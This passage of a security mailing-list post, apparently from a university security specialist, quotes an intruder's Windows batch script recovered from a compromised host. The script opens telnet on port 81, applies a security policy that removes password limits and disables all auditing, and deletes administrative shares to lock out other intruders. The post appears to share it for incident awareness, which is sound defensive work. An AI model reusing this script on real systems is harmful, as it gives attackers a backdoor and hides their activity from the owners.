@regedit /S roots.reg
@net stop telnet
@net start telnet
@del roots.reg
echo [ lE pORt 81 et OUverT ] en telnet !!
echo.
echo [ La Securistation est en Cour ]
echo.
echo @[Version] >> temp
echo @signature="$Kamui$" >> temp
echo @Revision=1 >> temp
echo @[ Description du Profil ] >> temp
echo @Description=Default Security Settings. (Windows 2000
Professional) >> temp
echo @[ Acc?System ] >> temp
echo @MinimumPasswordAge = 0 >> temp
echo @MaximumPasswordAge = 42 >> temp
echo @MinimumPasswordLength = 0 >> temp
echo @PasswordComplexity = 0 >> temp
echo @PasswordHistorySize = 0 >> temp
echo @LockoutBadCount = 0 >> temp
echo @RequireLogonToChangePassword = 0 >> temp
echo @ClearTextPassword = 0 >> temp
echo @[ Audit ] >> temp
echo @AuditSystemEvents = 0 >> temp
echo @AuditLogonEvents = 0 >> temp
echo @AuditObjectAccess = 0 >> temp
echo @AuditPrivilegeUse = 0 >> temp
echo @AuditPolicyChange = 0 >> temp
echo @AuditAccountManage = 0 >> temp
echo @AuditProcessTracking = 0 >> temp
echo @AuditDSAccess = 0 >> temp
echo @AuditAccountLogon = 0 >> temp
echo @[ Valeur De Registre ] >> temp
echo @
machine\system\currentcontrolset\services\netlogon\parameters\signsecu
rechannel=4,1 >> temp
echo @
machine\system\currentcontrolset\services\netlogon\parameters\sealsecu
rechannel=4,1 >> temp
echo @
machine\system\currentcontrolset\services\netlogon\parameters\requires
trongkey=4,0 >> temp
echo @
machine\system\currentcontrolset\services\netlogon\parameters\requires
ignorseal=4,0 >> temp
echo @
machine\system\currentcontrolset\services\netlogon\parameters\disablep
asswordchange=4,0 >> temp
echo @
machine\system\currentcontrolset\services\lanmanworkstation\parameters
\requiresecuritysignature=4,0 >> temp
echo @
machine\system\currentcontrolset\services\lanmanworkstation\parameters
\enablesecuritysignature=4,1 >> temp
echo @
machine\system\currentcontrolset\services\lanmanworkstation\parameters
\enableplaintextpassword=4,0 >> temp
echo @
machine\system\currentcontrolset\services\lanmanserver\parameters\requ
iresecuritysignature=4,0 >> temp
echo @
machine\system\currentcontrolset\services\lanmanserver\parameters\enab
lesecuritysignature=4,0 >> temp
echo @
machine\system\currentcontrolset\services\lanmanserver\parameters\enab
leforcedlogoff=4,1 >> temp
echo @
machine\system\currentcontrolset\services\lanmanserver\parameters\auto
disconnect=4,15 >> temp
echo @
machine\system\currentcontrolset\control\sessionmanager\protectionmode
=4,1 >> temp
echo @
machine\system\currentcontrolset\control\sessionmanager\memorymanageme
nt\clearpagefileatshutdown=4,0 >> temp
echo @
machine\system\currentcontrolset\control\print\providers\lanman print
services\servers\addprinterdrivers=4,0 >> temp
echo @
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >>
temp
echo @
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
>> temp
echo @
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
>> temp
echo @
machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >>
temp
echo @
machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >>
temp
echo @
machine\software\microsoft\windows\currentversion\policies\system\shut
downwithoutlogon=4,1 >> temp
echo @ machine\software\microsoft\windows\currentversion\
policies\system\legalnoticetext=1, >> temp
echo @ machine\software\microsoft\windows\currentversion\
policies\system\legalnoticecaption=1, >> temp
echo @
machine\software\microsoft\windows\currentversion\policies\system\dont
displaylastusername=4,0 >> temp
echo @ machine\software\microsoft\windows
nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo @ machine\software\microsoft\windows
nt\currentversion\winlogon\passwordexpirywarning=4 ,14 >> temp
echo @ machine\software\microsoft\windows
nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo @ machine\software\microsoft\windows
nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo @ machine\software\microsoft\windows
nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo @ machine\software\microsoft\windows
nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo @ machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\setcommand =4,0 >> temp
echo @ machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\securityle vel=4,0 >> temp
echo @[ Droit et Privilege ] >> temp
echo @seassignprimarytokenprivilege = >> temp
echo @seauditprivilege = >> temp
echo @sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo @sebatchlogonright = >> temp
echo @sechangenotifyprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0
>>temp
echo @secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo @secreatepermanentprivilege = >> temp
echo @secreatetokenprivilege = >> temp
echo @sedebugprivilege = *S-1-5-32-544 >> temp
echo @sedenybatchlogonright = >> temp
echo @sedenyinteractivelogonright = >> temp
echo @sedenynetworklogonright = >> temp
echo @sedenyservicelogonright = >> temp
echo @seenabledelegationprivilege = >> temp
echo @seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo @seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo @seinteractivelogonright =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960
408961-1637723038-1801674531-501>> temp
echo @seloaddriverprivilege = *S-1-5-32-544 >> temp
echo @selockmemoryprivilege = >> temp
echo @semachineaccountprivilege = >> temp
echo @senetworklogonright = %1 >> temp
echo @seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547>>
temp
echo @seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo @serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo @sesecurityprivilege = *S-1-5-32-544 >> temp
echo @seservicelogonright = >> temp
echo @seshutdownprivilege
=*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo @sesyncagentprivilege = >> temp
echo @sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo @sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo @sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo @setakeownershipprivilege = *S-1-5-32-544 >> temp
echo @setcbprivilege = >> temp
echo @seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545>>
temp
echo @Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb
/CFG temp
echo [ Le System est Maintenant Securiser ]
echo.
echo [ FInitiOn - FermetURE tOtalE ]
echo Deleting IPC share
echo.
@net share ADMIN$ /delete /yes
@net share C$ /delete /yes
@net share D$ /delete /yes
@net share IPC$ /delete /yes
cd\
a.bat
Contents of a.bat
net share /delete ADMIN$ /y
net share /delete IPC$ /y
net share /delete C$ /y
==============================================
David Taylor // Sr. Information Security Specialist
Information Systems & Computing // Information Security
University of Pennsylvania // Philadelphia PA USA
(215) 898-1236
http://www.upenn.edu/computing/security/
==============================================
SANS - The Twenty Most Critical Internet Security Vulnerabilities
http://www.sans.org/top20/
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBQja1E6xTsMlIjlJcEQJMywCcCeEwxXb3VTsM9rFQi/UtgOCQ/KMAn3Fq
tJLG0Tj5qdZGH6MZ7Y+DGpbt
=F9AR
-----END PGP SIGNATURE-----
More information about the Intrusions
mailing list